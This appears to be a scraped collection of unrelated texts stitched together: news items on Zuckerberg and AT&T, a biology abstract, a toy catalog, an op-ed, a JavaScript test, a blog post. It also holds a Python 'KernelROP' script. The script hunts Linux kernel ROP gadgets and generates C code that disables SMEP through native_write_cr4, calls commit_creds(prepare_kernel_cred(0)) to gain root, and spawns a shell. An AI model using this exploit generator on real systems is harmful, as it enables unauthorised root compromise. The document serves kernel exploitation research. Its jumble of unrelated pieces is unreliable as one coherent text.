Facebook CEO Mark Zuckerberg's latest comments about Sen. Elizabeth Warren (D-Mass.) may very well make their way into her next campaign ad.
The Verge published leaked audio Tuesday from two meetings between Zuckerberg and Facebook employees over the summer, with the Facebook CEO at one point expressing some anxiety over a Warren presidency and predicting the company will have to sue her administration if she's elected. Warren has called for breaking up major tech companies.
"I mean, if she gets elected president, then I would bet that we will have a legal challenge, and I would bet that we will win the legal challenge," Zuckerberg says. "And does that still suck for us? Yeah. I mean, I don't want to have a major lawsuit against our own government ... But look, at the end of the day, if someone’s going to try to threaten something that existential, you go to the mat and you fight."
Zuckerberg also tells employees that he's "worried" someone will try to "break up our company," although he expresses confidence that Facebook will prevail in a legal challenge because "there is the rule of law."
This is only one piece of the two hours of audio The Verge obtained, which also includes Zuckerberg repeatedly joking that he would have been fired long ago if not for his total control over Facebook. "[Having voting control of the company] was important because, without that, there were several points where I would've been fired," Zuckerberg says. "For sure, for sure."
Warren has already seized on Zuckerberg's comments, hitting back on Twitter by writing, "What would really 'suck' is if we don't fix a corrupt system that lets giant companies like Facebook engage in illegal anticompetitive practices, stomp on consumer privacy rights, and repeatedly fumble their responsibility to protect our democracy." Brendan Morrow | 2023-08-29T01:27:15.642919 | https://example.com/article/2671 |
Transient membrane localization of SPV-1 drives cyclical actomyosin contractions in the C. elegans spermatheca.
Actomyosin contractility is the major cellular force driving changes in cell and tissue shape. A principal regulator of contractility is the small GTPase RhoA. External mechanical forces have been shown to impact RhoA activity and cellular contractility. However, the mechanotransduction pathway from external forces to actomyosin contractility is poorly understood. Here, we show that actomyosin contractility in the C. elegans spermatheca is under control of RHO-1/RhoA, which, in turn, is regulated by the F-BAR and RhoGAP protein SPV-1. In the relaxed spermatheca, SPV-1 localizes through its F-BAR domain to the apical membrane, where it inhibits RHO-1/RhoA activity through its RhoGAP domain. Oocyte entry forces the spermatheca cells to stretch, and subsequently SPV-1 detaches from the membrane, permitting RHO-1 activity to increase. The increase in RHO-1 activity facilitates spermatheca contraction and expulsion of the newly fertilized embryo into the uterus, leading to relaxation of the spermatheca, SPV-1 membrane localization, and initiation of a new cycle. Our results demonstrate how transient membrane localization of a novel F-BAR domain, likely via specific binding to curved membranes, coupled to a RhoGAP domain, can provide feedback between a mechanical signal (membrane stretching) and actomyosin contractility. We anticipate this to be a widely utilized feedback mechanism used to balance actomyosin forces in the face of externally applied forces, as well as intrinsic processes involving cell deformation, from single-cell migration to tissue morphogenesis. | 2024-02-05T01:27:15.642919 | https://example.com/article/7066 |
Developmental Skills
Weplay
We here at Weplay develop our systematic products according to children's holistic needs, ranging over visual-auditory-tactile perception, motor skills, balance coordination, fine motor skills, and creative play. Made in Taiwan based on Universal Design, Weplay products help children grow up happily and healthily.
Products from this Manufacturer
Weplay Apple Links is a building block set consisting of lightweight green and red cubes (apples), 2 sizes of brown plastic bumpy rods (caterpillars), green foam ovals (leaves), and a wooden needle (caterpillar) and thread. The “apples” have a holes on each side and corners for builders to insert “caterpillars” or needle and thread to attach other “apples” or “leaves” to build their own abstract creations or representations of other real world objects.
Don’t let the cookies crumble! Cookie Festival is a construction game all about balance. Kids can balance the four different colored cookiemen in red, white, yellow and green on top of the rocking Banana Base for a game of stacking. The cookiemen have arms and legs that fit together like a 3D puzzle, providing a variety of stacking options with or without the Banana Base to inspire creativity. The included user guide provides play suggestions as well as additional information about the product related to child development.
WePlay Forest Party is comprised of five, brightly colored, vinyl-covered high density foam hills (four “ladybugs” and one “caterpillar”). Forest Party is designed to assist children to develop gross motor skills, balance and coordination. The hills can be used on either the curve side to crawl or walk over, or the flat side on which players can rock and balance. Forest Party is a product that is suitable for individual or group active play, for ages six months and up. Total weight of all five pieces is approximately 86 pounds.
Made of sturdy plastic and rubber, Honey Hills are a set of interlocking steppers with a concave and convex surface on each piece. The shape and design make them ideal to be stacked and pathed for kids to walk on during playtime. With accompanying tactile bags that can be filled with stimulating items like sand, rice or beans, Honey Hills is a tool to target the senses as well as physical skills.
Weplay’s Icy Ice building blocks consists of 28 - 9” and 28 - 4” hollow yet sturdy plastic snowflake-shaped pieces in blue, green, white and orange. The blocks can interlock along their edges, allowing players to click the pieces together in three dimensions to create abstract designs or more recognizable objects as simple as a flower or a butterfly, to a ferriswheel or mama duck and her ducklings. Illustrations are provided for inspiration or for players to replicate; the design possibilities are infinite!
Infinite Loop is a one player game that challenges his / her reaction time while developing dexterity and reflexes. The Infinite Loop is composed of one blue and one yellow plastic track unified as one, and stacked on top of one another. The lower track has smooth ergonomic grips for each hand to hold and for a player to open and close the top track in which a pale orange plastic ball rolls end to end; the trick is close the track before the ball gets to the open end and then repeat! Two balls are provided for different resistance levels (dimpled and smooth).
This set of blocks is themed with circus animals and full of balancing and building potential. The Jumbo Circus set comes with 4 balancing planks along with 4 large, 8 medium and 16 small elephant blocks. The blocks can be stacked, rolled, connected, and rocked for endless creativity and construction opportunities. The elephant blocks come in 4 vibrant colors and have illustrations and textures on them for visual and tactile appeal. Each kit comes with an activity guide for extended play ideas.
Linkits is a 95 piece, multicolored, odorless, EVA foam building block set for all ages. The box includes three block sizes: oblong blocks with 2 holes, hollow circle blocks, and solid circulars block that fits in holes of the other two types of blocks. The blocks are lightweight, versatile, and inviting to twist and turn to join them together.
The Motor Skill Universal Set is a collection of toys as tools that are designed to target fine and gross motor skills during playtime activities. The blocks, rods, hoops, bean bags and other pieces are ideal for active play. While it comes with an activity guide full of suggested activities, with a nearly endless number of possible combinations, Weplay’s Motor Skill Universal Set can be used for any number of activities.
Designed to bolster balance and coordination, the Pedal Walker is a stand-up 4-wheeled elliptical cycle, complete with oversized pedals for feet of all sizes, as well as optional upright handrails. As with a typical bicycle, the Walker “cyclist” depresses each of the pedals in turn to move the Walker forward on its wheels. Foam grips on each of the fixed-height handrails provide the “cyclist” with a comfortable place for resting hands for balance and support as he / she would use bicycle handlebars.
Set of six plastic “river stones” in three different sizes and textures. Stepping stones are large enough to stand on and can be used alone or stacked up to three high to vary the level of physical challenge and work on gross motor skills. Maximum weight tolerance is approximately 175lbs.
Weplay’s Rock “N” Fish is comprised of durable plastic fishing poles with heavy duty string and oversized molded plastic anchors to hook three sets of molded plastic sea creature pairs: blue fish, red crab, and yellow starfish. Each of the sea creatures are punctured with multiple holes, one of which is intended for hooking with the anchor. All are mounted on curved bases which activates a rocking motion when players attempt to hook the creatures. Two individual and one paired set of fishing poles are included for two-handed or partner play.
The Rocking Bowl is an oversized, durable, clear plastic basin in which one or two small children can sit inside to engage in imaginary, active play. The Bowl is molded with wavy edges for an ergonomic grip, and embossed “water ripples” for traction when stepping into or sitting in the Bowl. Fill the Bowl with players, toys, water, packing peanuts, or other engaging materials for a multi-sensory, growth experience.
The Weplay Rocking Seesaw is a balancing board for players ages three and up. The Seesaw is made of red plastic, and is wide and sturdy enough to for children through adults to take advantage of a toy that improves balance, coordination and body awareness. It has two rubberized anti-slip squares on which the player places his / her feet on the top of the board, as well as rubberized strips on the bottom for additional safety. The Seesaw’s narrow fulcrum ensures that the player will be challenged at any age!
How long can you keep the ball going? Rolling 4 Fun promotes problem solving as kids guide the small ball along the tracks. There are four different routes to expand play and create challenges for kids to advance engagement with the toy. Rolling 4 Fun encourages fine motor skills, speech and language along with cognitive development with the variety of ways to play.
Clear plastic basin with undulating form is set on a yellow painted steel frame that is adjustable in height and has two lockable wheels for ease of moving the Table into different play spaces. Multipurpose Table lid can be used as a storage shelf (under the Table) for supplies, as a separate play surface to hold sand and toys, or as a writing surface when placed on top of the tub.
The three set pairs of Stepping Stones mimic walking on stilts and encourage children to practice their gross motor skills. The plastic stones are flat on one side and rounded on the other with anti-slip pads and rope to grasp hold of to provide children with two challenge levels. Beginners can use the flat side for more stability when learning how to “stilt walk” and the rounded side can be used to challenge kids that have mastered the stilt walking with the Stepping Stones as the surface rocks below their feet.
The Team Walker is a physical team building activity that can be played with one to four or more Walkers. Each Team Walker wears a pair of “skis” (plastic planks with a foot strap) that include an attached looped rope for each hand to hold and assist in lifting the foot. The “skis” interlock as would train cars, and the Walkers work together to step or ski in unison. Walkers can practice walking independently before joining with other players.
Tricky Fish is a Frisbee-sized, circular fish-shaped ball maze. Like a fish swimming through water, players tilt the Fish back and forth and side-to- side to move a small ball through the shallow-grooved maze from the start to end point. The Fish maze includes an optional clear plastic cover to encase the ball as it moves through the maze. Also included is a larger ping pong-sized ball that fits in the Fish eye, and can be used in the maze (without the cover).
Tricky Tree is 3-Dimensional puzzle comprised of a sturdy green plastic tree base and “trunk” with “branches” sticking out of it at various intervals and directions on which players thread and stack six lightweight, orange and yellow plastic discs. For added visual interest and developmental skill growth, each disc has a facial expression on one side, and the flip side contains embossed basic shapes. A multitude of game options challenge and enhance a child’s development across multiple domains.
This customizable and interactive toy puts a new spin on a classic game of ring toss. Twiggle Toss includes a rocking base, Y-shaped twig, rings and bean bags which allows children to customize game for many levels of play. As a tossing game—choosing either the rings or bean bags—Twiggle Toss is designed to target visual perception and hand-eye coordination.
Weplay Up On Top encourages balance and promotes body awareness as kids stabilize the malleable pieces on top of their heads. There are a total of 3 pieces featuring different facial expressions in blue, green and orange. Kids can practice balancing one piece and add on more pieces as they advance their gross motor skills.
WePlay Wavy Tactile Path is comprised of eight separate brightly colored path blocks reminiscent of gentle rolling hills. The ends of the path pieces dovetail to join easily with one another with a hook and slot mechanism. Each path block is topped with varying sized circles or bars that protrude slightly from the base for traction and sensory input. Path blocks are sturdy enough to support the weight of supervising adults, and can be arranged in multiple configurations for variety and challenge.
The We Block series is composed of three distinct sets of large, brightly colored, interlocking panels (blocks) with distinct characteristics. 1. The Tactile Cube set is composed of two blocks of three types of panels: raised dot-patterned, raised grid-patterned, and raised concentric-circle patterned. 2. The Reflector Cube set is distinguished by six blocks of shatter-proof reflective surfaces such as concave, convex, funhouse effect, etc. 3.
The Weplay Squeezer is a set of three hand-squeezable silicon rings that develop tactile awareness and provide tactile input and stimulation. Each 2.5” ring is a different bright color with differing levels of resistance to progressively improve grip strength. Additionally, the rings have small, low-profile, soft, rounded nubs on them to provide additional sensory input and improve circulation.
The Weplay Twister is a set of three squeezable and twistable silicon rings with that develop tactile awareness and provide tactile input and stimulation. Each 6” ring is a different bright colors with differing levels of resistance to progressively improve hand and wrist strength. Additionally, the rings have small, low-profile, soft, silicone bristles on them to provide additional sensory input as they are twisted or when used to brush other parts of the body.
Whether for sitting, standing, or any position in between, Weplay’s Whally Board is an ergonomically designed balance board. The board’s appearance was inspired by a fish, and has bubbles and waves to continue the aquatic theme of the shape. The hard plastic is textured, which allows children to find grip on the board for sitting and standing. | 2024-03-31T01:27:15.642919 | https://example.com/article/3599 |
By Bill Spadea
This post originally appeared at NJ 101.5
_
That’s right, the education bureaucrats and local officials are coming for more of your money. They will tell you it’s for security and infrastructure. They’ll tell you that you need an all-day kindergarten. And that you should be happy to pay more, after all, it’s only a few more dollars every month right? They’ll tell you it’s for new school buildings.
What they won’t tell you is how they have been prioritizing all the money they already take from you. What they won’t tell you is why they allowed so much over-development in the first place. What they won’t tell you is how a building should cost more than 70 million dollars.
_
In Florence, the Lumberton district, it’s less than $25 million, so what are you complaining about? But make no mistake, in the highest taxed state in America, your taxes will be going up even more.
In Hillsborough, they want all day kindergarten and in Monroe, they want close to $150 million for a new middle school and an addition to the high school.
Question you have to ask yourself, is when is enough, enough? How much more can they take before you have your exit plan? How many times can they keep coming back to you for more? Why do you have to prioritize between food, entertainment, car payments and paying for your kids when the bureaucrats don’t have to do the same?
A ‘YES’ vote means higher taxes and the continuation of the same irresponsible behavior that has us in this mess.
A ‘NO’ vote shows that we can fight back. It shows that we’re willing to ignore the pleas from the bureaucrats to “think of the children”. It will show that we’re ready, willing and able to hold the local politicians accountable to protect our investment.
Let’s change health and pension benefits before we spend any additional money. Let’s stop the abuse by superintendents making thousands in perks and bonuses to get around the salary caps. Let’s find out which construction firms and lawyers are benefiting from your money and their political connections. Let’s simply say NO. #NotOneMoreDollar. We can fix NJ, but not if we keep doing the same thing year after year.
Here’s information on each of the proposed spending questions:
Information on Florence Township Referendum – click HERE.
Information on Hillsborough Referendum – click HERE.
Information on Monroe Township Referendum – click HERE.
And here’s a guide to find your polling location:
Florence Township polling locations – click HERE.
Hillsborough polling locations – click HERE.
Monroe Township polling locations – click HERE.
_
Bill Spadea is NJ 101.5 radio’s morning host as well as host of Chasing News with Bill Spadea on My9/Fox5/Fox29. | 2024-01-22T01:27:15.642919 | https://example.com/article/8911 |
require('../spec_helper')
const humanInterval = require('human-interval')
const humanTime = require(`${root}lib/util/human_time`)
describe('lib/util/human_time', () => {
context('.long', () => {
it('outputs minutes + seconds', () => {
expect(humanTime.long(humanInterval('2 minutes and 3 seconds'))).to.eq('2 minutes, 3 seconds')
expect(humanTime.long(humanInterval('65 minutes'))).to.eq('65 minutes, 0 seconds')
expect(humanTime.long(humanInterval('1 minute'))).to.eq('1 minute, 0 seconds')
})
it('outputs seconds', () => {
expect(humanTime.long(humanInterval('59 seconds'))).to.eq('59 seconds')
expect(humanTime.long(humanInterval('1 second'))).to.eq('1 second')
})
})
context('.short', () => {
it('outputs mins', () => {
expect(humanTime.short(humanInterval('2 minutes and 3 seconds'))).to.eq('2m, 3s')
expect(humanTime.short(humanInterval('65 minutes'))).to.eq('65m')
expect(humanTime.short(humanInterval('1 minute'))).to.eq('1m')
})
it('outputs seconds', () => {
expect(humanTime.short(humanInterval('59 seconds'))).to.eq('59s')
expect(humanTime.short(humanInterval('1 second'))).to.eq('1s')
expect(humanTime.short(0)).to.eq('0s')
expect(humanTime.short(500)).to.eq('500ms')
expect(humanTime.short(10)).to.eq('10ms')
})
})
})
| 2023-09-05T01:27:15.642919 | https://example.com/article/5872 |
NASA suffered multiple major data breaches within the past few years, showing that the agency's cybersecurity measures could use work. While it relies on private space companies for launches and other services these days, it's likely still in possession of data detailing proprietary technologies and other sensitive information. NASA is far from the only government agency with cybersecurity issues, though: just recently, auditors found that Pentagon's weapons systems and the US ballistic missile system are cybersecurity nightmares.
"NASA and its Federal cybersecurity partners are continuing to examine the servers to determine the scope of the potential data exfiltration and identify potentially affected individuals. This process will take time. The ongoing investigation is a top agency priority, with senior leadership actively involved," Gibbs wrote. He also said that NASA will contact everyone whose details might have been compromised with more details. | 2024-02-07T01:27:15.642919 | https://example.com/article/2168 |
#!/usr/bin/python
from pwn import *
import ropgadget
from ropgadget.binary import Binary
from capstone import CS_MODE_32
from ropgadget.args import Args
from ropgadget.core import Core
import re
import time
import os
import pickle
class KernelROP(object):
def __init__(self, kernel_path, cmd, KASLR=False):
#self.b=angr.Project(KERNEL_PATH)
self.c = Core(Args(arguments = cmd).getArgs())
self.kernel_path = kernel_path
#self.k=ELF(kernel_path)
self.k = None
self.stack_pivot_gadgets = []
self.pop_rdi_ret_gadget = []
self.pop_rdx_ret_gadget = []
self.pop_rax_ret_gadget = []
self.swapgs_gadget = []
self.Iretq_gadget = None
self.stack_pivot_gadgets_in_text = ''
self.stack_pivot_gadgets_ready_to_use=[]
self.user_space_base=None
def is_stack_pivot(self, gadget):
vaddr = gadget["vaddr"]
insts = gadget["gadget"]
if len(insts.split(';')) != 2:
return False
if vaddr % 8 != 0: # filter out gadget not align to 8
return False
regex = re.compile(r'xchg e\w\w, esp ; ret[\S]*')
if regex.search(insts) is None:
return False
return True
def lookingForIretq(self):
opcodes = '48cf'
if self.c._Core__checksBeforeManipulations() is False:
return False
execsections = self.c._Core__binary.getExecSections()
arch = self.c._Core__binary.getArchMode()
for section in execsections:
#if section['name'] != '.text':
#continue
allRef = [m.start() for m in re.finditer(re.escape(opcodes.decode("hex")), section["opcodes"])]
for ref in allRef:
vaddr = self.c._Core__offset + section["vaddr"] + ref
rangeS = int(self.c._Core__options.range.split('-')[0], 16)
rangeE = int(self.c._Core__options.range.split('-')[1], 16)
if (rangeS == 0 and rangeE == 0) or (vaddr >= rangeS and vaddr <= rangeE):
print(("0x%08x" %(vaddr) if arch == CS_MODE_32 else "0x%016x" %(vaddr)) + " : %s" %(opcodes))
self.Iretq_gadget = vaddr
return
#s=self.k.get_section_by_name('.text')
#low_bound=s.header['sh_addr']
#high_bound=low_bound+s.header['sh_size']
#for _ in self.k.search('\x48\xcf'):
#if _ > low_bound and _ < high_bound:
#print 'Found iretq gadget at '+hex(_)
#self.Iretq_gadget=_
#break
return
def lookingForSwapgs(self):
if self.c._Core__checksBeforeManipulations()==False:
return False
arch = self.c._Core__binary.getArchMode()
print("Gadgets information\n============================================================")
for gadget in self.c._Core__gadgets:
vaddr = gadget["vaddr"]
insts = gadget["gadget"]
if insts == "swapgs ; pop rbp ; ret":
print("Swapgs gadget found at "+hex(vaddr)+' '+insts)
self.swapgs_gadget.append(gadget)
return
def lookingForPopRaxRetGadget(self):
if self.c._Core__checksBeforeManipulations()==False:
return False
arch = self.c._Core__binary.getArchMode()
print("Gadgets information\n============================================================")
for gadget in self.c._Core__gadgets:
vaddr = gadget["vaddr"]
insts = gadget["gadget"]
if insts == "pop rax ; ret":
print("Pop Rax Ret found at "+hex(vaddr))
self.pop_rax_ret_gadget.append(gadget)
break
return
def lookingForPopRdxRetGadget(self):
if self.c._Core__checksBeforeManipulations()==False:
return False
arch = self.c._Core__binary.getArchMode()
print("Gadgets information\n============================================================")
for gadget in self.c._Core__gadgets:
vaddr = gadget["vaddr"]
insts = gadget["gadget"]
if insts == "pop rdx ; ret":
print("Pop Rdx Ret found at "+hex(vaddr))
self.pop_rdx_ret_gadget.append(gadget)
break
return
def lookingForPopRdiRetGadget(self):
if self.c._Core__checksBeforeManipulations()==False:
return False
arch = self.c._Core__binary.getArchMode()
print("Gadgets information\n============================================================")
for gadget in self.c._Core__gadgets:
vaddr = gadget["vaddr"]
insts = gadget["gadget"]
if insts == "pop rdi ; ret":
print("Pop Rdi Ret found at "+hex(vaddr))
self.pop_rdi_ret_gadget.append(gadget)
break
return
def lookingForStackPivotGadgets(self):
"""
find stack pivot to user space
"""
if self.c._Core__checksBeforeManipulations() == False:
return False
arch = self.c._Core__binary.getArchMode()
print("Gadgets information\n============================================================")
for gadget in self.c._Core__gadgets:
vaddr = gadget["vaddr"]
insts = gadget["gadget"]
#print(("0x%08x" %(vaddr) if arch == CS_MODE_32 else "0x%016x" %(vaddr)) + " : %s" %(insts))
if self.is_stack_pivot(gadget):
print(("0x%08x" %(vaddr) if arch == CS_MODE_32 else "0x%016x" %(vaddr)) + " : %s" %(insts))
self.stack_pivot_gadgets.append(gadget)
self.stack_pivot_gadgets_in_text += hex(vaddr) + ' : ' + insts+'\n'
return True
def analyze_to_get_gadgets(self):
if os.path.isfile('rop_core.cache'):
try:
self.c._Core__offset = int(self.c._Core__options.offset, 16) if self.c._Core__options.offset else 0
except ValueError:
print("[Error] The offset must be in hexadecimal")
return Fa
self.c._Core__binary = Binary(self.c._Core__options)
if self.c._Core__checksBeforeManipulations() == False:
return False
print '[+] loading rop core from disk'
with open('rop_core.cache','rb') as f:
self.c._Core__gadgets = pickle.load(f)
else:
try:
self.c._Core__offset = int(self.c._Core__options.offset, 16) if self.c._Core__options.offset else 0
except ValueError:
print("[Error] The offset must be in hexadecimal")
return Fa
self.c._Core__binary = Binary(self.c._Core__options)
if self.c._Core__checksBeforeManipulations() == False:
return False
else:
print 'getting all gadgets'
self.c._Core__getAllgadgets()
print '[+] dumping rop core to disk'
with open('rop_core.cache','wb') as f:
for agadget in self.c.gadgets():
agadget['decodes'] = None
pickle.dump(self.c.gadgets(), f, -1)
def find_offset_for_stack_pivot(self):
for line in self.stack_pivot_gadgets_in_text.split('\n'):
register_storing_ip = ''
if line == '':
continue
target_str, gadget = line.split(':')
target_addr = int(target_str, 16)
stack_offset_str = gadget.strip().split('ret')[1]
if stack_offset_str != '':
stack_offset = int(stack_offset_str.strip(), 16)
else:
stack_offset = 0
if 'eax' in gadget:
register_storing_ip = 'eax'
elif 'ebx' in gadget:
register_storing_ip = 'ebx'
elif 'ecx' in gadget:
register_storing_ip = 'ecx'
elif 'edx' in gadget:
register_storing_ip = 'edx'
elif 'edi' in gadget:
register_storing_ip = 'edi'
elif 'esi' in gadget:
register_storing_ip = 'esi'
else:
print '...'
import IPython; IPython.embed()
assert 0
#3print 'gadget =', gadget.strip()
#print 'stack addr = %x' % (target_addr & 0xffffffff)
#print 'stack top = %x' % (stack_offset)
sp_gadget = {'stack_addr': target_addr,
'stack_top': stack_offset,
'gadget': gadget.strip(),
'register': register_storing_ip}
self.stack_pivot_gadgets_ready_to_use.append(sp_gadget)
return
def find_function_address_by_name(self, function_name):
try:
addr=self.k.symbols[function_name]
print function_name, 'is found at', hex(addr)
except:
print 'can not find'+function_name
return -1
return addr
def routine1_to_c_code(self, register_storing_ip='eax'):
self.analyze_to_get_gadgets()
self.k=ELF(self.kernel_path)
self.lookingForStackPivotGadgets()
self.find_offset_for_stack_pivot()
self.lookingForPopRdiRetGadget()
self.lookingForSwapgs()
self.lookingForIretq()
native_write_cr4 = self.find_function_address_by_name('native_write_cr4')
prepare_kernel_cred = self.find_function_address_by_name('prepare_kernel_cred')
commit_creds = self.find_function_address_by_name('commit_creds')
#print self.pop_rdi_ret_gadget
selected_gadget_idx=-1
# choose a stack pivot with selected registers
for idx, stack_pivot_gadget in enumerate(self.stack_pivot_gadgets_ready_to_use):
if stack_pivot_gadget['register']==register_storing_ip:
selected_gadget_idx = idx
break
if selected_gadget_idx==-1:
print 'can not find a suitable stack pivot gadget for register:', register_storing_ip
import IPython; IPython.embed()
consts =''
consts += '#include <sys/mman.h>\n'
consts += '#define native_write_cr4 '\
+ hex(native_write_cr4)\
+ '\n'
consts += '#define PREPARE_KERNEL_CRED '\
+ hex(prepare_kernel_cred)\
+ '\n'
consts += '#define COMMIT_CREDS '\
+ hex(commit_creds)\
+ '\n'
consts += '#define poprdiret '\
+ hex(self.pop_rdi_ret_gadget[0]['vaddr'])\
+ '\n'
consts += '#define swapgs '\
+ hex(self.swapgs_gadget[0]['vaddr'])\
+ '\n'
consts += '#define iretq '\
+ hex(self.Iretq_gadget)\
+ '\n'
consts += '#define stack_pivot_gadget '\
+ hex(self.stack_pivot_gadgets_ready_to_use[selected_gadget_idx]['stack_addr'])\
+ '\n'
consts += '#define stack_top_offset '\
+ hex(self.stack_pivot_gadgets_ready_to_use[selected_gadget_idx]['stack_top'])\
+ '\n'
consts += '#define krop_base_to_map '\
+ hex(self.stack_pivot_gadgets_ready_to_use[selected_gadget_idx]['stack_addr']&0xfffff000)\
+ '\n'
consts += 'int rop_start='\
+ hex(self.stack_pivot_gadgets_ready_to_use[selected_gadget_idx]['stack_addr']\
&0xfff\
+ self.stack_pivot_gadgets_ready_to_use[selected_gadget_idx]['stack_top'])\
+ ';\n'
consts += 'void* krop_base_mapped;\n'
body = '''unsigned long rop_chain[] = {
poprdiret,
0x6f0,
native_write_cr4,
get_root_payload,
swapgs,
0, //dummy
iretq,
get_shell,
0,//user_cs,
0,//user_rflags,
0,//krop_base_mapped + 0x4000,
0//user_ss
};
'''
header = '''
unsigned long user_cs, user_ss, user_rflags;
static void save_state()
{
asm(
"movq %%cs, %0\\n"
"movq %%ss, %1\\n"
"pushfq\\n"
"popq %2\\n"
: "=r"(user_cs), "=r"(user_ss), "=r"(user_rflags)
:
: "memory");
}
void get_shell()
{
char *shell = "/bin/sh";
char *args[] = {shell, NULL};
execve(shell, args, NULL);
}
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;
void get_root_payload(void)
{
commit_creds(prepare_kernel_cred(0));
}
'''
krop_base = self.stack_pivot_gadgets_ready_to_use[selected_gadget_idx]\
['stack_addr']&0xfffff000
tail = '''
void prepare_krop(){
krop_base_mapped=mmap((void *)krop_base_to_map,0x8000,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0);
if (krop_base_mapped<0){
perror("mmap failed");
}
rop_chain[8]=user_cs;
rop_chain[9]=user_rflags;
rop_chain[10]=krop_base_mapped + 0x4000;
rop_chain[11]=user_ss;
memcpy(krop_base_mapped+rop_start,rop_chain,sizeof(rop_chain));
puts("rop_payload_initialized");
}
'''
c_code = consts + header + body + tail
print 'finied generating c code for KROP'
return selected_gadget_idx, c_code, self.c
def test():
path_to_vmlinux = '/home/ww9210/kernels/4.10-no-kasan/vmlinux'
cmd = ('--binary ' + path_to_vmlinux + ' --depth 5').split()
krop = KernelROP(path_to_vmlinux, cmd)
start=time.clock()
krop.analyze_to_get_gadgets()
end = time.clock()
print 'gadget analysis cost', end-start, 'seconds'
krop.lookingForStackPivotGadgets()
krop.find_offset_for_stack_pivot()
krop.lookingForPopRdiRetGadget()
krop.lookingForPopRaxRetGadget()
krop.lookingForPopRdxRetGadget()
krop.lookingForSwapgs()
krop.lookingForIretq()
#print krop.stack_pivot_gadgets
#print krop.stack_pivot_gadgets_ready_to_use
#print krop.stack_pivot_gadgets_in_text
#print krop.pop_rdi_ret_gadget
krop.find_function_address_by_name('prepare_kernel_cred')
krop.find_function_address_by_name('commit_creds')
krop.find_function_address_by_name('native_write_cr4')
def test1():
path_to_vmlinux = '/home/ww9210/kernels/4.12-no-kasan/vmlinux'
#path_to_vmlinux = '/home/ww9210/kernels/4.10-inject-no-kasan/vmlinux'
#path_to_vmlinux = '/home/ww9210/kernels/4.10-rc5-no-kasan/vmlinux'
#path_to_vmlinux = '/home/ww9210/kernels/4.10-inject-10150-no-kasan/vmlinux'
cmd = ('--binary ' + path_to_vmlinux + ' --depth 5')\
.split()
krop = KernelROP(path_to_vmlinux, cmd)
idx, c_code, core = krop.routine1_to_c_code(register_storing_ip='eax')
print idx
stack_pivot_addr = krop.stack_pivot_gadgets_ready_to_use[idx]['stack_addr']
print c_code
print 'stack_pivot_addr',hex(stack_pivot_addr)
def test2():
path_to_vmlinux = '/home/ww9210/kernels/4.10-inject-no-kasan/vmlinux'
cmd = ('--binary ' + path_to_vmlinux + ' --depth 15').split()
krop = KernelROP(path_to_vmlinux, cmd)
idx,c_code,core = krop.routine1_to_c_code(register_storing_ip='eax')
print idx
stack_pivot_addr = krop.stack_pivot_gadgets_ready_to_use[idx]['stack_addr']
print c_code
print 'stack_pivot_addr',hex(stack_pivot_addr)
if __name__=='__main__':
test1()
| 2024-03-16T01:27:15.642919 | https://example.com/article/7996 |
AT&T Mulls Re-Entry in India
AT&T, Inc. (T) is planning another attempt to re-enter the Indian telecom industry by buying out a 25% stake in Indian billionaire, Mukesh Ambani’s venture, Reliance Jio Infocomm Ltd. According to Bloomberg and elsewhere, AT&T’s planned buyout for approximately $3.5 billion will represent the largest foreign direct investment in that country. This would bring Reliance Jio’s market value to approximately $14 billion.
AT&T’s strategic move in the Indian market remains consistent with its Project Velocity-IP plans launched in Nov 2012, to invest approximately $14 billion. Given the competitive market conditions and saturation in the U.S. wireless industry, AT&T seeks a greener pasture by expanding wings in the Asian markets.
This is not the first time that AT&T has forayed into the Indian sub-continent. Previously, it owned one-third equity in a telecom joint venture (now known as Idea Cellular) formed by the company and Indian corporate giants Tata Group and Aditya Birla Group. However, in 2004, AT&T exited the market by selling its 32.9% stake to the remaining stakeholders.
After almost a decade, the company is contemplating a new entry in India, where lucrative business opportunities are still prevalent thanks to rapid reforms. According to market reports, the country boosts the second largest wireless networks globally after China, based on subscribers.
This sector has been the one of the largest in India to attract foreign direct investment. These investments contribute to its accelerated growth rate of 7% and business revenues of over $50 billion as per the 2010-2011 financial year records.
Further, the telecom sector in India remains one of the key business grounds for telecom giants like Vodafone Group PLC (VOD) — the second largest operator after China Mobile Limited (CHL) — and the home turf of the world’s third largest telecom operator, Bharti Airtel Limited, based on subscribers.
However, the Indian telecom market is characterized by one of the lowest call tariffs in the world due to growing competitiveness with increased participation by some of the largest players in the global telecom space. This is resulting into high losses and diminishing profitability of the operators in India.
The sector however lacks proper infrastructure, which has restricted its growth to only 2G and 3G network deployments while developments in the LTE space is still lagging. Despite these drawbacks, AT&T’s interest in Reliance Jio could be the spectrum holding that lies with it through winning License for Broadband Wireless Access (BWA) Spectrum in 22 circles across India, auctioned by the government in 2010.
Given the acquisition of spectrum, the company aims at deploying LTE across the country, expanding wireless data services. The company plans to invest around Rupees 500 billion in LTE deployments and has collaborated with Spirit DSP to deliver voice and video calls over LTE.
We believe AT&T, with its investments in Reliance Jio would be able to catapult the Indian LTE market and gain significantly from the current market scenario of emerging prospects given a lower rate of penetration in the LTE space. | 2023-11-03T01:27:15.642919 | https://example.com/article/9270 |
Sunday, January 23, 2011
Update for those of you who found HN through Ebert's Tweet and who've been following the Tashi & Wash thing:
Tashi says her blog got sixteen thousand new visitors in 24 hours.
She thanked me for that. I don't know why. As I told her, I added the link for HN to the end of the email I sent Roger Ebert as a dithered-over afterthought. I thought maybe he might be interested in reading about somebody else's oral cancer; I had honestly forgotten that the top post was about Tashi and Wash. I was, in short, attention-whoring.
And so much good has come out of that. Even if Tashi still has to worry about money--and more on that in a second--she knows that there are *that many more people* who know about what Wash is going through. Raising consciousness like that cannot ever be a bad thing. I'm a firm believer in the idea that the more you tell a story, the more power you have to affect how it turns out.
This is an excellent example of how a) chance favors the prepared, or b) even grovelling ingrates like me occasionally get things right.
As for the money: That's a big deal, and it's not one I'm ashamed of talking up. Arizona's state indigent care program barely covers the necessities. They consider Wash ineligible for things like nausea meds and antidepressants, because what's it matter? he's just gonna die anyhow. That means that Tashi has to do things like buy drugs instead of pay car insurance--or, rather, with the grace of God, she *did* have to budget that way. Maybe now things will be a bit easier.
